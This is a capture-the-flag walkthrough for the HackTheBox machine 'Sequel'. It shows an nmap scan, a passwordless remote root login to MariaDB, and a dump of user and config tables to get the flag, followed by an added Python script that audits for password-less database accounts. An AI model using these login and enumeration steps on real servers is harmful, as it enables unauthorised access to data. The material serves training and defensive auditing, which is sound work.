Overview
This write-up describes the steps to obtain the flag on HackTheBox: Sequel.
Port Scan
$ nmap -F -Pn -v sequel.htb --min-rate=5000
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-15 11:07 EDT
Initiating Connect Scan at 11:07
Scanning sequel.htb (10.129.193.163) [100 ports]
Discovered open port 3306/tcp on 10.129.193.163
Completed Connect Scan at 11:07, 0.93s elapsed (100 total ports)
Nmap scan report for sequel.htb (10.129.193.163)
Host is up (0.29s latency).
Not shown: 99 closed tcp ports (conn-refused)
PORT     STATE SERVICE
3306/tcp open  mysql
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.98 seconds
The scan shows that a MySQL service is exposed on port 3306.
MySQL
Try logging in as the root user.
$ mysql -u root -h sequel.htb
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 37
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>
The login succeeded, so explore the databases.
MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| htb                |
| information_schema |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.248 sec)
MariaDB [(none)]> use htb
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [htb]> show tables;
+---------------+
| Tables_in_htb |
+---------------+
| config        |
| users         |
+---------------+
2 rows in set (0.247 sec)
MariaDB [htb]> select * from users;
+----+----------+------------------+
| id | username | email            |
+----+----------+------------------+
|  1 | admin    | admin@sequel.htb |
|  2 | lara     | lara@sequel.htb  |
|  3 | sam      | sam@sequel.htb   |
|  4 | mary     | mary@sequel.htb  |
+----+----------+------------------+
4 rows in set (0.247 sec)
MariaDB [htb]> select * from config;
+----+-----------------------+----------------------------------+
| id | name                  | value                            |
+----+-----------------------+----------------------------------+
|  1 | timeout               | 60s                              |
|  2 | security              | default                          |
|  3 | auto_logon            | false                            |
|  4 | max_size              | 2M                               |
|  5 | flag                  | 7b4bec00d1a39e3dd4e021ec3d915da8 |
|  6 | enable_uploads        | false                            |
|  7 | authentication_method | radius                           |
+----+-----------------------+----------------------------------+
7 rows in set (0.248 sec)
The flag is found in the config table.
That's all.
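The root login above was accepted over the network without a password. As an added example (not part of the original write-up), this Python script audits account rows from mysql.user for that condition; the function names, the query in the comment and the sample rows are assumptions made for illustration.

```python
# Added example (not from the original write-up): flag MariaDB accounts that
# accept a login with no password. Rows are assumed to come from
#   mysql -N -B -e "SELECT User, Host, plugin, Password, authentication_string FROM mysql.user"
# (column names as in MariaDB's mysql.user; run by an administrator).

LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}
# Plugins that authenticate with a stored password hash. Other plugins
# (e.g. unix_socket) legitimately leave the hash columns empty.
PASSWORD_PLUGINS = {"", "mysql_native_password", "mysql_old_password"}

# Constructed sample rows (tab-separated); not data from the box in this write-up.
SAMPLE = "\n".join([
    "root\tlocalhost\tunix_socket\t\t",
    "root\t%\t\t\t",
    "backup\tlocalhost\tmysql_native_password\t\t",
    "app\t10.0.0.%\tmysql_native_password\t\t*" + "A" * 40,
])


def has_hash(value):
    """True if a hash column holds something other than empty/NULL."""
    return value not in ("", "NULL")


def audit(batch_output):
    """Return (account, severity) for every password-less account."""
    findings = []
    for line in batch_output.splitlines():
        if not line.strip():
            continue
        # Pad so trailing empty columns are never missing.
        user, host, plugin, password, auth = (line.split("\t") + [""] * 5)[:5]
        if plugin not in PASSWORD_PLUGINS:
            continue  # e.g. unix_socket: no password hash expected
        if has_hash(password) or has_hash(auth):
            continue
        # Reachable from the network if the host pattern is not loopback-only.
        severity = "warning" if host in LOCAL_HOSTS else "critical"
        findings.append((f"{user}@{host}", severity))
    return findings


if __name__ == "__main__":
    for account, severity in audit(SAMPLE):
        print(f"[{severity}] {account} has no password")
```

Accounts reported as critical should be given a password or restricted to a local host pattern, and port 3306 should not be reachable from untrusted networks.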